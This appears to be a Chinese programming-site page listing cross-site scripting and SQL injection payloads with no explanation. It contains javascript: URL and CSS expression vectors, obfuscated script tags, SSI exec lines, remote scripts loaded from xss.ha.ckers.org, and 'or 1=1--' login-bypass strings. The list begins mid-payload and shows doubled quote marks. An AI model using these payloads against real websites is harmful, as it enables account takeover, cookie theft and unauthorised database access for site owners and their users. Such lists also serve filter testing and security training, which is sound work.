当前位置: 网学 > 编程文档 > ASP > 正文

XSS测试语句大全

来源:Http://myeducs.cn 联系QQ:点击这里给我发消息 作者: 用户投稿 来源: 网络 发布时间: 13/06/17
"livescript:[code]">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(''XSS'');">
<IFRAME SRC=javascript:alert(''XSS'')></IFRAME>
<FRAMESET><FRAME SRC=javascript:alert(''XSS'')></FRAME></FRAMESET>
<TABLE BACKGROUND="javascript:alert(''XSS'')">
<DIV STYLE="background-image: url(javascript:alert(''XSS''))">
<DIV STYLE="behaviour: url(''http://www.how-to-hack.org/exploit.html');">
<DIV STYLE="width: expression(alert(''XSS''));">
<STYLE>@im\port''\ja\vasc\ript:alert("XSS")'';</STYLE>
<IMG STYLE=''xss:expre\ssion(alert("XSS"))''>
<STYLE TYPE="text/javascript">alert(''XSS'');</STYLE>
<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert(''XSS'')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert(''XSS'')")}</STYLE>
<BASE HREF="javascript:alert(''XSS'');//">
getURL("javascript:alert(''XSS'')")
a="get";b="URL";c="javascript:";d="alert(''XSS'');";eval(a+b+c+d);
<XML SRC="javascript:alert(''XSS'');">
"> <BODY ONLOAD="a();"><SCRIPT>function a(){alert(''XSS'');}</SCRIPT><"
<SCRIPT SRC="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
<IMG SRC="javascript:alert(''XSS'')"
<!--#exec cmd="/bin/echo ''<SCRIPT SRC''"--><!--#exec cmd="/bin/echo ''=http://xss.ha.ckers.org/a.js></SCRIPT>''"-->
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<SCRIPT a=">" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT =">" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT a=">" '''' SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT "a=''>''" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A>
admin''--
'' or 0=0 --
" or 0=0 --
or 0=0 --
'' or 0=0 #
" or 0=0 #
or 0=0 #
'' or ''x''=''x
" or "x"="x
'') or (''x''=''x
'' or 1=1--
" or 1=1--
or 1=1--
'' or a=a--
" or "a"="a
'') or (''a''=''a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi'' or 1=1 --
hi'' or ''a''=''a
hi'') or (''a''=''a
hi") or ("a"="a
  • 下一篇资讯: Mssql高级注入笔记II
  • 网学推荐

    免费论文

    原创论文

    浏览:
    设为首页 | 加入收藏 | 论文首页 | 论文专题 | 设计下载 | 网学软件 | 论文模板 | 论文资源 | 程序设计 | 关于网学 | 站内搜索 | 网学留言 | 友情链接 | 资料中心
    版权所有 QQ:3710167 邮箱:3710167@qq.com 网学网 [Myeducs.cn] 您电脑的分辨率是 像素
    Copyright 2008-2015 myeducs.Cn www.myeducs.Cn All Rights Reserved
    湘ICP备09003080号